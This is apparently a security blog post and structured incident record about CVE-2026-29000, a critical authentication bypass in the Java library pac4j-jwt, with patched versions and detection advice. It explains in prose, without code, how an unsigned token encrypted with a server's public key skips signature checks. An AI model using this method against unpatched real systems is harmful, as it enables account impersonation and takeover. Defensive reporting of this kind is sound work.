• Home
  • cyber
  • pac4j: Critical pac4j-jwt Authentication Bypass Vulnerability Allows Attackers to Impersonate Any User
cyber Vulnerability

pac4j: Critical pac4j-jwt Authentication Bypass Vulnerability Allows Attackers to Impersonate Any User

Mar 5, 2026 2 min read
pac4j: Critical pac4j-jwt Authentication Bypass Vulnerability Allows Attackers to Impersonate Any User

Critical Authentication Bypass Flaw in pac4j-jwt Exposes Systems to Full Takeover

A severe vulnerability in the widely used Java authentication library pac4j-jwt (CVE-2026-29000) allows attackers to bypass authentication entirely and impersonate any user including administrators with minimal effort. The flaw, assigned a CVSS score of 10.0, was discovered by the CodeAnt AI Security Research Team during an investigation into open-source code patches.

How the Exploit Works

The vulnerability stems from a critical oversight in how the library handles unsigned JSON Web Tokens (JWTs). Normally, pac4j-jwt employs two security layers: encryption to protect token data and a cryptographic signature to verify authenticity. However, researchers found that if an attacker crafts an unsigned token (PlainJWT) and encrypts it using the server’s public RSA key, the library fails to properly validate the signature.

Due to a misplaced null check in the code, the signature verification step is skipped entirely. Instead of rejecting the invalid token, the system processes the unverified claims allowing attackers to forge arbitrary identities, such as administrative access, without needing private keys or credentials.

Affected Systems & Patching

The flaw impacts deployments using RSA-encrypted tokens alongside the JwtAuthenticator configuration. The open-source community responded swiftly, with maintainer Jérôme Leleu releasing patches within two business days of disclosure. Users must upgrade to the following secure versions:

  • 4.x branch: 4.5.9 or newer
  • 5.x branch: 5.7.9 or newer
  • 6.x branch: 6.3.3 or newer

Security teams can verify exposure by checking package managers for vulnerable versions and scanning application code for instances where both encryption and signature configurations are applied.

The discovery underscores the risks of improper token validation in authentication frameworks, particularly when public-key cryptography is involved.

Source: https://gbhackers.com/critical-pac4j-jwt-authentication-bypass-vulnerability-allows-attackers-to-impersonate-any-user/

CodeAnt AI cybersecurity rating report: https://www.rankiteo.com/company/codeant-ai

"id": "COD1772714088",
"linkid": "codeant-ai",
"type": "Vulnerability",
"date": "3/2026",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization's existence"
{'affected_entities': [{'customers_affected': 'Users of pac4j-jwt with '
                                              'vulnerable configurations',
                        'industry': 'Technology/Authentication',
                        'type': 'Software Library'}],
 'attack_vector': 'Remote Exploitation',
 'data_breach': {'data_encryption': 'RSA-encrypted tokens (exploited in '
                                    'attack)'},
 'description': 'A severe vulnerability in the widely used Java authentication '
                'library pac4j-jwt (CVE-2026-29000) allows attackers to bypass '
                'authentication entirely and impersonate any user, including '
                'administrators, with minimal effort. The flaw stems from a '
                'critical oversight in how the library handles unsigned JSON '
                'Web Tokens (JWTs). Attackers can craft an unsigned token '
                '(PlainJWT), encrypt it using the server’s public RSA key, and '
                'bypass signature verification due to a misplaced null check '
                'in the code.',
 'impact': {'identity_theft_risk': 'High (arbitrary user impersonation)',
            'operational_impact': 'Full system takeover, administrative access '
                                  'impersonation',
            'systems_affected': 'Systems using pac4j-jwt with RSA-encrypted '
                                'tokens and JwtAuthenticator configuration'},
 'investigation_status': 'Vulnerability patched',
 'lessons_learned': 'Risks of improper token validation in authentication '
                    'frameworks, particularly with public-key cryptography',
 'post_incident_analysis': {'corrective_actions': 'Code fix to enforce '
                                                  'signature validation, '
                                                  'release of patched versions',
                            'root_causes': 'Misplaced null check in signature '
                                           'verification, improper handling of '
                                           'unsigned JWTs'},
 'recommendations': 'Upgrade to patched versions, verify package managers for '
                    'vulnerable versions, scan application code for vulnerable '
                    'configurations',
 'references': [{'source': 'CodeAnt AI Security Research Team'}],
 'response': {'containment_measures': 'Upgrade to patched versions (4.5.9+, '
                                      '5.7.9+, 6.3.3+)',
              'remediation_measures': 'Patch deployment, code scanning for '
                                      'vulnerable configurations'},
 'title': 'Critical Authentication Bypass Flaw in pac4j-jwt Exposes Systems to '
          'Full Takeover',
 'type': 'Authentication Bypass',
 'vulnerability_exploited': 'CVE-2026-29000'}
Published by
Jeremy C
Jeremy C
You might also like
Great! Next, complete checkout for full access to Rankiteo Blog.
Welcome back! You've successfully signed in.
You've successfully subscribed to Rankiteo Blog.
Success! Your account is fully activated, you now have access to all content.
Success! Your billing info has been updated.
Your billing was not updated.